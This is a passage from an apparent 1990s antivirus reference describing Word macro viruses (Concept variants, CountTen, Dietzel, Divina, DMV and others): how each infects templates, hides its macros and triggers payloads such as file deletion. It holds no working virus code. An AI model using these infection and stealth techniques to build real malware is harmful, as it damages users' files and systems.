  18587. Encrypted: 3 of the 4 macros
  18588. Macro names: AutoOpen (FileSaveAs), EditSize, FileSort, HaHa
  18589. Size of macros: 2129 Bytes in .doc files
  18590.                 2041 Bytes in .dot files
  18591. Place of origin: Unknown
  18592. Date of origin: Summer 1996
  18593. Payload     Yes
  18594. Common In-The-Wild: No
  18595. Description:
  18596.  
  18597. Concept.D activates when an infected file is opened
  18598. (AutoOpen).  Further documents become infected when they
  18599. are saved with the FileSaveAs command.
  18600.  
  18601. Upon infection of a new document, Concept.D changes the
  18602. font color of all the existing text to white, which creates the
  18603. impression that all the text disappeared (or was deleted).
  18604. Concept.D then adds the following text to the active document:
  18605.  
  18606. " i said: say goodbye to all your stuff (look at that hard drive
  18607. spin!). "
  18608.  
  18609. Upon an attempt to save an infected document, Concept.D
  18610. tries to save the document 100 times, causing an irregular
  18611. disk activity.
  18612.  
  18613.  
  18614.  
  18615. [Word_Concept.E]
  18616. Virus name: Word.Concept.E
  18617. Virus Type: Word macro virus
  18618. Number of macros: 4
  18619. Encrypted: No
  18620. Macro names: AutoOpen (FileSaveAs), AAAZAO, AAAZFS, Load
  18621. Size of macros: 1657 Bytes in .doc files
  18622.                 1472 Bytes in .dot files
  18623. Place of origin: Unknown
  18624. Date of origin: Summer 1996
  18625. Payload             Yes
  18626. Common In-The-Wild: No
  18627. Description:
  18628.  
  18629. The difference between this new variant and the original
  18630. Concept virus can be found in the names of the macros and the
  18631. contents of the "Load" macro.
  18632. Concept.E activates when an infected document is opened
  18633. (AutoOpen).  Further documents become infected when they
  18634. are saved with the FileSaveAs command.
  18635.  
  18636. Upon infection of a new document, Concept.E displays a
  18637. message with a " 1 " in it.
  18638.  
  18639. Concept.E also has a virus code that tries to save the active
  18640. document in the T:\VIR directory.
  18641.  
  18642.  
  18643. [Word_Concept.F (a.k.a. Parasite 1.0, P-Site)]
  18644. Virus name: Word.Concept.F (a.k.a. Parasite 1.0, P-Site)
  18645. Virus Type: Word macro virus
  18646. Number of macros: 7
  18647. Encrypted: Yes
  18648. Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
  18649. Size of macros: 3673 Bytes in .doc files
  18650.                 3453 Bytes in .dot files
  18651. Place of origin: USA
  18652. Date of origin: July 1996
  18653. Destructive: Yes
  18654. Common In-The-Wild: Yes
  18655. Description:
  18656.  
  18657. Concept.F has various payloads. The first one replaces the
  18658. following words in infected documents:
  18659.  
  18660. "and" with "not".
  18661.  
  18662. The second payload is a little bit more comprehensive.
  18663. Concept.F checks the system time for a specific value in the
  18664. days section. In case of a 16 (16th of each month), it activates
  18665. its payloads. It then replaces the following letters/words in
  18666. infected documents:
  18667.  
  18668. "." (dot) with "," (comma)
  18669.  
  18670. "and" with "not"
  18671.  
  18672. "a" with an "e"
  18673.  
  18674. This new Concept variant also displays the following window:
  18675.  
  18676. "   Parasite Virus 1.0   "
  18677.  
  18678. "   Your computer is infected with the Parasite Virus, Version 1.0!   "
  18679.  
  18680.  
  18681. [Word_Concept.G (a.k.a. Parasite 0.8, P-Site)]
  18682. Virus name: Word.Concept.G (a.k.a. Parasite 0.8, P-Site)
  18683. Virus Type: Word macro virus
  18684. Number of macros: 7
  18685. Encrypted: Yes
  18686. Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
  18687. Size of macros: 3670 Bytes in .doc files
  18688.                 3450 Bytes in .dot files
  18689. Place of origin: USA
  18690. Date of origin: July/August 1996
  18691. Destructive: Yes
  18692. Common In-The-Wild: No
  18693. Description:
  18694.  
  18695. According to the Concept.G virus code, this new variant is a
  18696. beta release of the Concept.F (version 1.0) virus.
  18697. Concept.G has various payloads. The first one replaces the
  18698. following words in infected documents:
  18699.  
  18700. "and" with "not"
  18701.  
  18702. The second payload is a little bit more comprehensive. Concept.G
  18703. checks the system time for a specific value in the days section.
  18704. In case of a 16 (every 16th of the month) it activates its payloads.
  18705. It then replaces the following letters/word in infected documents:
  18706.  
  18707. "." (dot) with "," (comma)
  18708.  
  18709. "and" with "not"
  18710.  
  18711. "a" with an "e"
  18712.  
  18713.  
  18714.  
  18715. [Word_Concept.I]
  18716. Virus name: Word.Concept.I
  18717. Virus Type: Word macro virus
  18718. Number of  macros: 4 or 5
  18719. Encrypted: No
  18720. Macro names: AAAEED, AAAUUO, IPayload, DocClose, ToolsSpelling
  18721. Size of macros: 2885 Bytes
  18722. Place of origin: USA
  18723. Date of origin: September 1996
  18724. Destructive: No
  18725. Common In-The-Wild: No
  18726. Description:
  18727.  
  18728. Concept.I activates when an infected document is closed
  18729. (DocClose).
  18730.  
  18731. Further documents become infected in two different ways.
  18732. It infects when the user selects the option "Tools/Spelling" or
  18733. when an infected document is closed (DocClose).
  18734. Depending on the selected infection routine, a new infected
  18735. document contains 5 (DocClose infection routine) macros or
  18736. only 4 (Tools/Spelling infection routine) macros.
  18737.  
  18738. Upon infection of a new document, Concept.I displays a
  18739. message with a " 1 " in it.
  18740.  
  18741.  
  18742. [Word_Concept.J (a.k.a. Parasite.B)]
  18743. Virus name: Word.Concept.J (a.k.a. Parasite.B)
  18744. Virus Type: Word macro virus
  18745. Number of macros: 7
  18746. Encrypted: Yes
  18747. Macro names: K, A678, Para, Site, Payload, AutoOpen
  18748. Size of macros: 3326 Bytes in .doc files
  18749.                 3042 Bytes in .dot files
  18750. Place of origin: USA
  18751. Date of origin: Summer 1996
  18752. Destructive: Yes
  18753. Common In-The-Wild: Yes
  18754. Description:
  18755.  
  18756. The main difference between this new variant and Concept.G
  18757. is that it does not have the "I8U9YB" macro (AutoExit in the
  18758. global template).
  18759.  
  18760. It also does not replace "." (dot) with "," (comma) on the 16th
  18761. of each month.
  18762.  
  18763. Concept.J still has some other payloads. It checks the system
  18764. time for a specific value in the days section. In case of a 16
  18765. (every 16th of the month) it activates its payloads. It then
  18766. replaces the following letters/word in infected documents:
  18767.  
  18768. "and" with "not"
  18769.  
  18770. "e" with an "a" (this used to be "a" with an "e" in Concept.G).
  18771.  
  18772.  
  18773. [Word_Concept.K:NL (a.k.a. Pheeew)]
  18774. Virus name: Word.Concept.K:NL (a.k.a. Pheeew)
  18775. Virus Type: Word macro virus
  18776. Number of macros: 4
  18777. Encrypted: No
  18778. Macro names: AutoOpen, IkWordNietGoed1, IkWordNietGoed2, Lading
  18779. Size of macros: 2759 Bytes
  18780. Place of origin: Unknown
  18781. Date of origin: Unknown
  18782. Destructive: Yes
  18783. Common In-The-Wild: No
  18784. Description:
  18785.  
  18786. Concept.K is the first Dutch macro virus.
  18787.  
  18788. When an infected document is opened, Concept.K checks for a
  18789. previous infection of the global template (normal.dot). It does
  18790. this by looking for the two names of the macros "Lading" and
  18791. "BestandOpslaanAls". If the global template is not infected,
  18792. Concept.K copies its virus macros into the global template.
  18793. The macro "IkWordNietGoed2" is saved under the name
  18794. "BestandOpslaanAls" ("FileSaveAs").
  18795.  
  18796. Further documents become infected when the "FileSaveAs"
  18797. command is used. After infection the virus shows various windows
  18798. with the following text:
  18799.  
  18800. Window 'Important':
  18801.  
  18802. "   Gotcha !   "
  18803.  
  18804. Window 'FINAL WARNING!':
  18805.  
  18806. "   STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC   "
  18807.  
  18808. If a user clicks the "No" button on the last window, a destructive
  18809. payload is activated. All files in the "C:\" and "C:\DOS"
  18810. directory are deleted. This leaves the computer unbootable.
  18811.  
  18812.  
  18813. [Word_Concept.L (a.k.a. BlastC)]
  18814. Virus name: Word.Concept.L (a.k.a. BlastC)
  18815. Virus Type: Word macro virus
  18816. Number of macros: 7
  18817. Encrypted: No
  18818. Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
  18819.              AutoClose, ExitRoutine, BlastCDrive
  18820. Size of macros: 3744 Bytes
  18821. Place of origin: USA
  18822. Date of origin: Unknown
  18823. Payload:         Yes
  18824. Common In-The-Wild: No
  18825. Description:
  18826.  
  18827. Concept.L activates when an infected document is opened
  18828. (AutoOpen).  Further documents become infected when they
  18829. are saved (FileSaveAs).
  18830.  
  18831. Concept.L displays 2 messages:
  18832.  
  18833. Upon activation:
  18834.  
  18835. "   Welcome to the 'WINWORD.BLAST_C' macro virus...   "
  18836.  
  18837. After infection of the global template (Normal.dot):
  18838.  
  18839. "   Uh Ohhh. NORMAL.DOT just got infected...   "
  18840.  
  18841. Upon closing the active document on the 24th of each month,
  18842. Concept.L will start its destructive payload. It will launch the
  18843. File Manager and delete the directory C:\DELETEME.
  18844.  
  18845.  
  18846. [Word_Concept.M (a.k.a. New_Horizon)]
  18847. Virus name: Word.Concept.M (a.k.a. New_Horizon)
  18848. Virus Type: Word macro virus
  18849. Number of macros: 5
  18850. Encrypted: No
  18851. Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
  18852.              AutoClose, ExitRoutine
  18853. Size of macros: 2432 Bytes in .doc files
  18854.                 2055 Bytes in global template
  18855. Place of origin: USA
  18856. Date of origin: Unknown
  18857. Destructive: No
  18858. Common In-The-Wild: No
  18859. Description:
  18860.  
  18861. Concept.M activates when an infected document is opened
  18862. (AutoOpen).  Further documents become infected when they
  18863. are saved with the "FileSaveAs" command.
  18864.  
  18865. This new Concept variant displays 2 messages:
  18866.  
  18867. Upon activation:
  18868.  
  18869.  "   Uh Ohhh. NORMAL.DOT just got infected...   "
  18870.  
  18871. Upon opening of an infected document:
  18872.  
  18873. "   Welcome to the Winword.New_Horizons macro virus   "
  18874.  
  18875.  
  18876. [Word_Concept.N (a.k.a. Concept.hcr)]
  18877. Virus name: Word.Concept.N (a.k.a. Concept.hcr)
  18878. Virus Type: Word macro virus
  18879. Number of macros: 4
  18880. Encrypted: Yes
  18881. Macro names: FileSaveAs, XAAZAO, XAAZFS, XayLoad
  18882. Size of macros: 1968 Bytes
  18883. Place of origin: Unknown
  18884. Date of origin: November 1996
  18885. Destructive: No
  18886. Common In-The-Wild: No
  18887. Description:
  18888.  
  18889. Concept.N is a new variant based on the original Concept.A
  18890. virus.
  18891.  
  18892. All of its macro names start with the letter "X" (except for
  18893. FileSaveAs). Therefore, Concept.N is classified as an intended virus,
  18894. since it does not replicate naturally.
  18895.  
  18896.  
  18897. [Word_Concept.O:Tw]
  18898. Virus name: Word.Concept.O:Tw
  18899. Virus Type: Word macro virus
  18900. Number of macros: 4
  18901. Encrypted: No
  18902. Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
  18903. Size of macros: 1968 Bytes in documents
  18904. Place of origin: Unknown
  18905. Date of origin: 1996
  18906. Destructive: No
  18907. Common In-The-Wild: Yes
  18908. Description:
  18909.  
  18910. The main difference between this new variant and the original
  18911. Concept.A virus is that Concept.O only works with the Chinese
  18912. version of Microsoft Word.
  18913.  
  18914. Concept.O infects the global template when an infected
  18915. document is opened (AutoOpen). Further documents become
  18916. infected when they are saved with the "FileSaveAs" command.
  18917.  
  18918. For more information, please refer to the Concept.A virus description.
  18919.  
  18920.  
  18921. [Word_Concept.Q]
  18922. Virus name: Word.Concept.Q
  18923. Virus Type: Word macro virus
  18924. Number of macros: 4
  18925. Encrypted: No
  18926. Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
  18927. Size of macros: 1959 Bytes in documents
  18928.                 1652 Bytes in global template
  18929. Place of origin: Unknown
  18930. Date of origin: 1996
  18931. Destructive: No
  18932. Common In-The-Wild: Yes
  18933. Description:
  18934.  
  18935. The difference between this new variant and the original
  18936. Concept virus is the contents of the "Payload" macro.
  18937. Concept.Q does not contain the comment "That's enough to
  18938. prove my point."
  18939.  
  18940. Concept.Q infects the global template when an infected
  18941. document is opened (AutoOpen). Further documents become
  18942. infected when they are saved with the "FileSaveAs" command.
  18943.  
  18944. For more information, please refer to the Concept.A virus description.
  18945.  
  18946.  
  18947. [Word_Concept.R (a.k.a Sutra, Diamond)]
  18948. Virus name: Word.Concept.R (a.k.a Sutra, Diamond)
  18949. Virus Type: Word macro virus
  18950. Number of macros: 4
  18951. Encrypted: No
  18952. Macro names: AutoOpen (FileSaveAs), CTFISTCCLLESS11, "CTFBORNIN83"
  18953.              DiamondSutra, FileSaveAs
  18954. Size of macros: 4069 Bytes in .doc files
  18955.                 3221 Bytes in global template
  18956. Place of origin: Unknown
  18957. Date of origin: Unknown
  18958. Destructive: No
  18959. Seen In-The-Wild: No
  18960. Description:
  18961.  
  18962. This new variant is based on the original Concept.A virus. Only
  18963. a few additions have been made and some macro names were
  18964. changed.
  18965.  
  18966. When Concept.R infects the global template it displays various
  18967. messages:
  18968.  
  18969. "   SHOSHI-11=TCCL6F200P,in 1983, Japan!!!!!   "
  18970.  
  18971. "   SHOSHIisCTFexactly, inYYY with pwd 901109, BUT less 11years   "
  18972. "   BUT SEEMS & CHAR === EXACT   "
  18973.  
  18974. "   Guy who understand 29 and Prajnaparamita Diamond Sutra   "
  18975. "   governors noble truth within the self self self self self so   "
  18976. "   CTF=TCCL-11 BUT CTF in 1983   "
  18977.  
  18978. "  CTF's wife is LTC.JAC 24 ; CTF = SUN SUN SUN SUN + 4 CRUELTY   "
  18979.  
  18980. "   You will then tell your friends and your friends will tell   "
  18981. "   others and other .. other other other other other other !!!!!   "
  18982. "   till till till the sun rises in the east which means   "
  18983. "   CTF=TCCLby all sense   "
  18984.  
  18985. When a document becomes infected, Concept.R adds an
  18986. AutoCorrect entry that replaces "teh" with "Shoshi in 1983 is
  18987. the Sun." This payload works only with the Windows 95
  18988. version of Microsoft Word (Word 7.0).
  18989.  
  18990.  
  18991. [Word_Concept.V]
  18992. Virus name: Word.Concept.V
  18993. Virus Type: Word macro virus
  18994. Number of macros: 3
  18995. Encrypted: No
  18996. Macro names: AutoOpen, MSlothAE, MSlothSA
  18997. Size of macros: 1484 Bytes
  18998. Place of origin: USA
  18999. Date of origin: January 1997
  19000. Payload: Yes
  19001. Common In-The-Wild: No
  19002. Description:
  19003.  
  19004. Concept.V is a new variant based on Concept and the Wazzu.H
  19005. virus.  It includes the payload routine from Wazzu.H, inside the
  19006. "AutoExec" macro (MSlothAE in documents), and the
  19007. "AutoOpen" ("FileSaveAs" in the global template) from
  19008. Concept.
  19009.  
  19010. Even though this new variant is based on two different viruses,
  19011. it is still able to spread and infect further documents.
  19012.  
  19013. For more information, please refer to the Wazzu.H and
  19014. Concept.A virus descriptions.
  19015.  
  19016.  
  19017. [Word_Concept.Y]
  19018. Virus name: Word.Concept.Y
  19019. Virus Type: Word macro virus
  19020. Number of macros: 4
  19021. Encrypted: No
  19022. Macro names: AAAZAO, AAAZFS, Payload, AutoOpen
  19023. Size of macros: 1992 Bytes
  19024. Place of origin: Unknown
  19025. Date of origin: 1997
  19026. Destructive: No
  19027. Common In-The-Wild: No
  19028. Description:
  19029.  
  19030. Concept.Y is a new variant based on the original Concept.A
  19031. virus.  The main difference between the two viruses is the
  19032. "Payload" macro, which has the following addition to its macro
  19033. code:
  19034.  
  19035. "   (For testing only...)   "
  19036.  
  19037. For more information, please refer to the Concept.A virus description.
  19038.  
  19039.  
  19040. [Word_Concept.Z]
  19041. Virus name: Word.Concept.Z
  19042. Virus Type: Word macro virus
  19043. Number of macros: 4
  19044. Encrypted: No
  19045. Macro names: AutoOpen, AAAAAB, AAAAAC, AAAAAD
  19046.              (AAAAAA, FileSave, FileSaveAs, ToolsMacro)
  19047. Size of macros: 1774 Bytes
  19048. Place of origin: Unknown
  19049. Date of origin: 1996
  19050. Destructive: No
  19051. Common In-The-Wild: Yes
  19052. Description:
  19053.  
  19054. Concept.Z activates when an infected document is opened
  19055. (AutoOpen).  Further documents become infected when they
  19056. are saved with the "FileSave" and "FileSaveAs" commands.
  19057.  
  19058. After infecting the global template, Concept.Z makes an entry
  19059. in the WINWORD6.INI file. It sets "WW6I=1."
  19060.  
  19061. Concept.Z tries to hide its presence by using "ToolsMacro"
  19062. (called macro stealth technique). It does not contain any
  19063. destructive payload.
  19064.  
  19065.  
  19066. [Word_CountTen.A (a.k.a. SaveCount)]
  19067. Virus name: Word.CountTen.A (a.k.a. SaveCount)
  19068. Virus Type: Word macro virus
  19069. Number of macros: 3
  19070. Encrypted: Yes
  19071. Macro names: AutoOpen FileSave, FileSaveAs
  19072. Size of macros: 956 Bytes
  19073. Place of origin: United States
  19074. Date of origin: December 1996
  19075. Destructive: Yes
  19076. Seen In-The-Wild: Yes
  19077. Description:
  19078.  
  19079. CountTen infects documents when an infected document is
  19080. opened and saved via the "FileSave" and FileSaveAs"
  19081. commands.
  19082.  
  19083. When CountTen infects a file, it sets the variable "SaveCount."
  19084. When an infected file is saved, this variable increments. This
  19085. technique is used to keep track of the number of times an
  19086. infected document has been saved. Upon reaching 10,
  19087. CountTen sets the following password:
  19088.  
  19089. "   What the hell are you doing?   "
  19090.  
  19091. This password is too long for the Microsoft Word password
  19092. box and therefore users can not change the password.
  19093.  
  19094. To get access to a password encrypted file, remove the viral
  19095. macros and create an "AutoOpen" macro with the following
  19096. information in the global template (NORMAL.DOT):
  19097.  
  19098. Sub Main
  19099. ToolsUnprotectDocument.DocumentPassword="What the hell
  19100. are you doing?"
  19101. End Sub
  19102.  
  19103.  
  19104. [Word_Daniel.A (a.k.a Daniel_1F)]
  19105. Virus name: Word.Daniel.A (a.k.a Daniel_1F)
  19106. Virus Type: Word macro virus
  19107. Number of macros: 2
  19108. Encrypted: Yes
  19109. Macro names: AutoOpen (Word6Menu), MacroManager
  19110. Size of macros: 2718 Bytes
  19111. Place of origin: Unknown
  19112. Date of origin: September 1996
  19113. Destructive: Yes
  19114. Common In-The-Wild: No
  19115. Description:
  19116.  
  19117. Daniel activates when an infected document is opened
  19118. (AutoOpen).
  19119.  
  19120. By removing the Tools/Macro option, Daniel tries to make
  19121. recognition of an infected file more difficult (called macro
  19122. stealth technique).
  19123.  
  19124. Daniel also redefines the File/Save menu item. Instead of the
  19125. original action, it will run the MacroManager.
  19126.  
  19127. When a file is opened with a non standard extension (not .doc
  19128. or .dot), Daniel will change the document summary info.
  19129. Under the keyword "Daniel_Stone" the following comment can
  19130. be found:
  19131.  
  19132. "   All information should be free   "
  19133.  
  19134.  
  19135. [Word_Dark.A (a.k.a. DarkSide)]
  19136. Virus name: Word.Dark.A (a.k.a. DarkSide)
  19137. Virus Type: Word macro virus
  19138. Number of macros: 4
  19139. Encrypted: Yes
  19140. Macro names: AutoClose, DarkSide1, HerramMacro, ToolsMacro
  19141. Size of macros: 1304 Bytes
  19142. Place of origin: Peru
  19143. Date of origin: Unknown
  19144. Payload: Yes
  19145. Seen In-The-Wild: No
  19146. Description:
  19147.  
  19148. Dark infects the global template (normal.dot) when an infected
  19149. document is closed. Further documents become infected when
  19150. they are also closed.
  19151.  
  19152. Upon infection Dark creates the DARKSIDE.1 file in the
  19153. directory of an infected file. The file contains the following
  19154. message:
  19155.  
  19156. "    ATENCION: esta computadora ha sido infectada!.   "
  19157. "    DarkSide1 sin una computadora es como Billy   "
  19158. "    The Kid sin un revolver! !   "
  19159. "    ... Virus DarkSide1 creado en la ciudad de Lima en enero de 1997 "
  19160. "    -=] DarkSide1 Is a peruvian virus writer [=-    "
  19161.  
  19162. To make recognition of an infected document more difficult,
  19163. Dark overwrites the Tools/Macro and Herram/Macro options
  19164. with its own code (called macro stealth technique).
  19165.  
  19166.  
  19167. [Word_Date.A (a.k.a. AntiDMV, Infezione)]
  19168. Virus name: Word.Date.A (a.k.a. AntiDMV, Infezione)
  19169. Virus Type: Word macro virus
  19170. Number of macros: 1
  19171. Encrypted: Yes
  19172. Macro names: AutoOpen
  19173. Size of macros: 1042 Bytes
  19174. Place of origin: USA
  19175. Date of origin: 1996
  19176. Destructive: Yes
  19177. Common In-The-Wild: Yes
  19178. Description:
  19179.  
  19180. Date infects the global template (normal.dot) once an infected
  19181. document in opened. Further documents become infected
  19182. when they are opened.
  19183.  
  19184. Infection occurs only until June 1, 1996. By the time you
  19185. read this document, Date should not be a threat anymore even
  19186. though infected documents might still be around.
  19187.  
  19188. Date is also known under the name AntiDMV. This name was
  19189. chosen because it removes the "AutoClose" macro from
  19190. documents. The macro virus "DMV," which has only one
  19191. "AutoClose" macro, can therefore be removed with the
  19192. Date virus.
  19193.  
  19194.  
  19195. [Word_Dedicato.A:It]
  19196. Virus name: Word.Dedicato.A:It
  19197. Virus Type: Word macro virus
  19198. Number of macros: 1
  19199. Encrypted: Yes
  19200. Macro names: AutoClose
  19201. Size of macros: 742 Bytes
  19202. Place of origin: Italy
  19203. Date of origin: April 1997
  19204. Payload: Yes
  19205. Seen In-The-Wild: No
  19206. Description:
  19207.  
  19208. Dedicato infects the global template when an infected
  19209. document is closed. Further documents become infected when
  19210. they are also closed (AutoClose).
  19211.  
  19212. Dedicato uses language specific commands, therefore it only
  19213. works with the Italian version of Microsoft Word.
  19214.  
  19215. The following comment can be found in the AutoClose macro:
  19216.  
  19217. "   REM Questo MacroVirus e' dedicato alla mia ex-ragazza   "
  19218. "   REM Federica, che anche se molti diranno il contrario..   "
  19219. "   REM io ho amato tanto...e ora mi manca...   (Gianlu)   "
  19220.  
  19221. When Dedicato triggers (8th and 20th of each month), it
  19222. displays the following 3 messages:
  19223.  
  19224. "   ....MacroVirus Federica in esecuzione....   "
  19225.  
  19226. "   ....Federica Mi Manchi....   "
  19227.  
  19228. "   Master Boot Sector Damaged   "
  19229.  
  19230.  
  19231. [Word_Dietzel.A]
  19232. Virus name: Word.Dietzel.A
  19233. Virus Type: Word macro virus
  19234. Number of macros: 5
  19235. Encrypted: Yes
  19236. Macro names: DATEISchliessen, EXTRASMakro, DATEIDokVorlagen,
  19237.              DATEISpeichernUnter, DATEIBeenden
  19238. Size of macros: 3987 Bytes
  19239. Place of origin: Germany
  19240. Date of origin: August 1996
  19241. Destructive: No
  19242. Common In-The-Wild: No
  19243. Description:
  19244.  
  19245. Activation of Dietzel occurs when an infected document is
  19246. closed (DATEISchliessen) or when Microsoft Word is exited
  19247. (DATEIBeenden).
  19248.  
  19249. Dietzel tries to make recognition of an infected document
  19250. more difficult by replacing the Tools/Macro option with a
  19251. dialog box very similar to the original one (called macro
  19252. stealth technique).  It only displays the macros in the global
  19253. template, except for the virus macros.
  19254.  
  19255. Dietzel's infection routine is very similar to that of traditional
  19256. companion viruses. The original document remains untouched,
  19257. instead for each saved document Dietzel creates a copy of the
  19258. infected global template. This new file is stored in the same
  19259. directory but with a .BAK extension.  The saved document is then
  19260. registered based on this new infected template.
  19261. Whenever an infected document is closed the associated
  19262. infected template will be loaded as a global template.
  19263.  
  19264.  
  19265. [Word_Divina.A (a.k.a. Roberta)]
  19266. Virus name: Word.Divina.A (a.k.a. Roberta)
  19267. Virus Type: Word macro virus
  19268. Number of macros: 1
  19269. Encrypted: Yes
  19270. Macro names: AutoClose
  19271. Size of macros: 2357 Bytes
  19272. Place of origin: Italy
  19273. Date of origin: 1996
  19274. Destructive: No
  19275. Common In-The-Wild: Yes
  19276. Description:
  19277.  
  19278. Divina infects the global template (normal.dot) when an
  19279. infected document is opened and then closed. Further
  19280. documents become infected when they are closed via the
  19281. "AutoClose" command.
  19282.  
  19283. Divina has two payloads. The first payload checks the system
  19284. time, and in case of a value of 17 in the minutes field, it will
  19285. display a set of windows. Between each displayed box it will
  19286. pause and beep.
  19287.  
  19288. "   ROBERTA TI AMO!   "
  19289.  
  19290. "   Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus?   "
  19291.  
  19292. "   Exit from system and low level format are recommended.   "
  19293.  
  19294. "   Exit from System?   "
  19295.  
  19296. After the last message Divina tries to exit Windows.
  19297.  
  19298. The second payload is activated on May 21. Divina will again
  19299. check the system clock, and if a document is being closed
  19300. between the 10th and 20th or between the 40th and 50th minute,
  19301. it will display another 2 windows.
  19302.  
  19303. "   DIVINA IS THE BEST!   "
  19304.  
  19305. Even though Divina does not contain any destructive payloads,
  19306. a scared user might low-level format his/her hard drive.
  19307.  
  19308.  
  19309. [Word_Divina.B (a.k.a. Roberta)]
  19310. Virus name: Word.Divina.B (a.k.a. Roberta)
  19311. Virus Type: Word macro virus
  19312. Number of macros: 1
  19313. Encrypted: Yes
  19314. Macro names: AutoClose
  19315. Size of macros: 1774 Bytes
  19316. Place of origin: Italy
  19317. Date of origin: 1996
  19318. Destructive: No
  19319. Common In-The-Wild: No
  19320. Description:
  19321.  
  19322. The main difference between this new variant and the original
  19323. Divina.A virus is that Divina.B does not have the second
  19324. payload, which activates on May 21.
  19325.  
  19326. Divina.B infects the global template (normal.dot) when an
  19327. infected document is opened and then closed. Further
  19328. documents become infected when they are closed with the
  19329. "AutoClose" command.
  19330.  
  19331. Divina.B has one payload that checks the system time, and
  19332. in case of a value of 17 in the minutes field, it will display a
  19333. set of windows. Between each displayed box it will pause and
  19334. beep.
  19335.  
  19336. "   ROBERTA TI AMO!   "
  19337.  
  19338. "   Hard Disk damaged   "
  19339.  
  19340. "   Exit from system and low level format are recommended.   "
  19341.  
  19342. "   Exit from System?   "
  19343.  
  19344.  
  19345. After the last message Divina tries to exit Windows.
  19346.  
  19347. Even though Divina.B does not contain any destructive
  19348. payloads, a scared user might low-level format his/her hard drive.
  19349.  
  19350.  
  19351. [Word_Divina.C (a.k.a. Roberta)]
  19352. Virus name: Word.Divina.C (a.k.a. Roberta)
  19353. Virus Type: Word macro virus
  19354. Number of macros: 1
  19355. Encrypted: Yes
  19356. Macro names: AutoClose
  19357. Size of macros: 3234 Bytes
  19358. Place of origin: Italy
  19359. Date of origin: 1996
  19360. Destructive: No
  19361. Common In-The-Wild: No
  19362. Description:
  19363.  
  19364. Divina.C is a rewritten variant of Divina. It does not contain
  19365. the second payload, which activates on May 21.
  19366.  
  19367. Divina.C infects the global template (normal.dot) when an
  19368. infected document is opened and then closed. Further
  19369. documents become infected when they are closed (AutoClose).
  19370.  
  19371. Divina.C has one payload that checks the system time, and
  19372. in case of a value of 17 in the minutes field, it will display a
  19373. set of windows. Between each displayed box it will pause and
  19374. beep. After the last message Divina tries to exit Windows.
  19375.  
  19376.  
  19377. [Word_Divina.D (a.k.a. Roberta)]
  19378. Virus name: Word.Divina.D (a.k.a. Roberta)
  19379. Virus Type: Word macro virus
  19380. Number of macros: 1
  19381. Encrypted: Yes
  19382. Macro names: AutoClose
  19383. Size of macros: 3234 Bytes
  19384. Place of origin: Italy
  19385. Date of origin: 1996
  19386. Destructive: No
  19387. Common In-The-Wild: Yes
  19388. Description:
  19389.  
  19390. The main difference between this new variant and Divina.C is
  19391. that the code has been slightly modified.
  19392. Divina.D infects the global template (normal.dot) when an
  19393. infected document is opened and then closed. Further
  19394. documents become infected when they are closed (AutoClose).
  19395.  
  19396. Divina.D has one payload that checks the system time, and
  19397. in case of a value of 17 in the minutes field, it will display a
  19398. set of windows. Between each displayed box it will pause and
  19399. beep.  After the last message Divina.D tries to exit Windows.
  19400.  
  19401.  
  19402. [Word_Divina.E (a.k.a. Roberta)]
  19403. Virus name: Word.Divina.E (a.k.a. Roberta)
  19404. Virus Type: Word macro virus
  19405. Number of macros: 1
  19406. Encrypted: Yes
  19407. Macro names: AutoClose
  19408. Size of macros: 3295 Bytes
  19409. Place of origin: Italy
  19410. Date of origin: 1996
  19411. Destructive: No
  19412. Common In-The-Wild: No
  19413. Description:
  19414.  
  19415. The main difference between this new variant and Divina.C is
  19416. that the code has been slightly modified.
  19417. Divina.E contains 2 lines made out of "*".
  19418.  
  19419. Divina.E infects the global template (normal.dot) when an
  19420. infected document is opened and then closed. Further
  19421. documents become infected when they are closed (AutoClose).
  19422.  
  19423. Divina.E has one payload that checks the system time, and
  19424. in case of a value of 17 in the minutes field, it will display a
  19425. set of windows. Between each displayed box it will pause and
  19426. beep.  After the last message Divina.E tries to exit Windows.
  19427.  
  19428.  
  19429. [Word_Divina.F (a.k.a. Roberta)]
  19430. Virus name: Word.Divina.F (a.k.a. Roberta)
  19431. Virus Type: Word macro virus
  19432. Number of macros: 1
  19433. Encrypted: Yes
  19434. Macro names: AutoClose
  19435. Size of macros: 3234 Bytes
  19436. Place of origin: Italy
  19437. Date of origin: 1997
  19438. Destructive: No
  19439. Common In-The-Wild: No
  19440. Description:
  19441.  
  19442. The main difference between this new variant and the previous
  19443. Divina viruses is that the code has been slightly modified.
  19444.  
  19445. Divina.F infects the global template (normal.dot) when an
  19446. infected document is opened and then closed. Further
  19447. documents become infected when they are closed (AutoClose).
  19448.  
  19449. For more information, please refer to the previous Divina virus
  19450. descriptions.
  19451.  
  19452.  
  19453. [Word_DMV.A (a.k.a. Demonstration)]
  19454. Virus name: Word.DMV.A (a.k.a. Demonstration)
  19455. Virus Type: Word macro virus
  19456. Number of macros: 1
  19457. Encrypted: No
  19458. Macro names: AutoClose
  19459. Size of macros: 3002 Bytes
  19460. Place of origin: USA
  19461. Date of origin: Fall 1994
  19462. Destructive: No
  19463. Common In-The-Wild: No
  19464. Description:
  19465.  
  19466. DMV was the first macro virus written by Joel McNamara, who
  19467. published a detailed paper about macro viruses. It is believed
  19468. that DMV invited additional virus authors to write Word macro
  19469. viruses. While the paper was not published until Concept was
  19470. discovered, it helped virus authors to use new techniques.
  19471. Joel McNamara also published an Excel macro virus, which is
  19472. nonfunctional (Excel.DMV.A)
  19473.  
  19474. DMV infects the global template (normal.dot) when an infected
  19475. document is closed. Further documents become infected when
  19476. they are also closed.
  19477.  
  19478. Upon infection, DMV displays the following messages:
  19479.  
  19480. "   Counting global macros   "
  19481.  
  19482. "   AutoClose macro virus is already installed in NORMAL.DOT.   "
  19483.  
  19484. "   Infected NORMAL.DOT with a copy of AutoClose macro virus.   "
  19485.  
  19486. "   AutoClose macro virus already present in this document.   "
  19487.  
  19488. "   Saved current document as template.   "
  19489.  
  19490. "   Infected current document with copy of AutoClose macro virus.   "
  19491.  
  19492. "   Macro virus has been spread. Now execute some other code   "
  19493. "                 (good, bad, or indifferent).                 "
  19494.  
  19495.  
